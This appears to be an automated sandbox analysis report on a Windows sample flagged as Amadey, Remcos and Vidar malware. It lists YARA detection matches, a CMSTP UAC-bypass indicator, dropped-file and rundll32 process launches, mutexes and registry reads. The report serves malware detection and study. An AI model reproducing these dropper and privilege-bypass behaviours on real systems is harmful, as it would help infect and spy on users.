Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E9D0C3	3_2_61E9D0C3
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E8D0B6	3_2_61E8D0B6
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E40065	3_2_61E40065
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E6904E	3_2_61E6904E
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E4304E	3_2_61E4304E
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E15337	3_2_61E15337
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E9E24F	3_2_61E9E24F
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E5023C	3_2_61E5023C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E19208	3_2_61E19208
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E62554	3_2_61E62554
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E534E3	3_2_61E534E3
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E4E4BF	3_2_61E4E4BF
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E77452	3_2_61E77452
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E94783	3_2_61E94783
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E7A790	3_2_61E7A790
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E18736	3_2_61E18736
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E58670	3_2_61E58670
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E37930	3_2_61E37930
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E10856	3_2_61E10856
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E7B85E	3_2_61E7B85E
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E21816	3_2_61E21816
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E9FBF0	3_2_61E9FBF0
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E55BD7	3_2_61E55BD7
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61EA0BA9	3_2_61EA0BA9
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61EA5B62	3_2_61EA5B62

Source: yaALNupJCH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: yaALNupJCH.exe, type: SAMPLE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 3.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 0.2.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 0.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 2.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_00416702 ExitWindowsEx,LoadLibraryA,GetProcAddress,

2_2_00416702

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 004255FF appears 41 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00CC16C0 appears 268 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00CC829B appears 46 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00CC1350 appears 93 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 004346BE appears 41 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00425668 appears 43 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00CC285B appears 64 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00401E65 appears 34 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00434D70 appears 54 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00CB2B70 appears 76 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 0042C510 appears 44 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 0040104E appears 123 times
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: String function: 00CC2ED0 appears 70 times

Source: yaALNupJCH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\yaALNupJCH.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@8/17@144/8

Source: C:\Users\user\Desktop\yaALNupJCH.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0041A998 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

2_2_0041A998

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0041B3F6 FindResourceA,LoadResource,LockResource,SizeofResource,

2_2_0041B3F6

Source: yaALNupJCH.exe	ReversingLabs: Detection: 76%
Source: yaALNupJCH.exe	Virustotal: Detection: 73%

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 2020
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe	Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_004178A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

2_2_004178A0

Source: C:\Users\user\Desktop\yaALNupJCH.exe

File created: C:\Users\user\AppData\Local\Temp\1000026011\

Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 3_2_0041A15D __ehhandler$?_Init@?$numpunct@G@std@@IAEXABV_Locinfo@2@_N@Z,__EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

3_2_0041A15D

Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0040F3C2 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

2_2_0040F3C2

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7592
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Mutant created: \Sessions\1\BaseNamedObjects\dh-A9HL6N
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Mutant created: \Sessions\1\BaseNamedObjects\9a9b42ef037916ec84b9b7b3ac05b288

Source: C:\Users\user\Desktop\yaALNupJCH.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: yaALNupJCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: yaALNupJCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: yaALNupJCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: yaALNupJCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: yaALNupJCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: yaALNupJCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: yaALNupJCH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: yaALNupJCH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: yaALNupJCH.exe

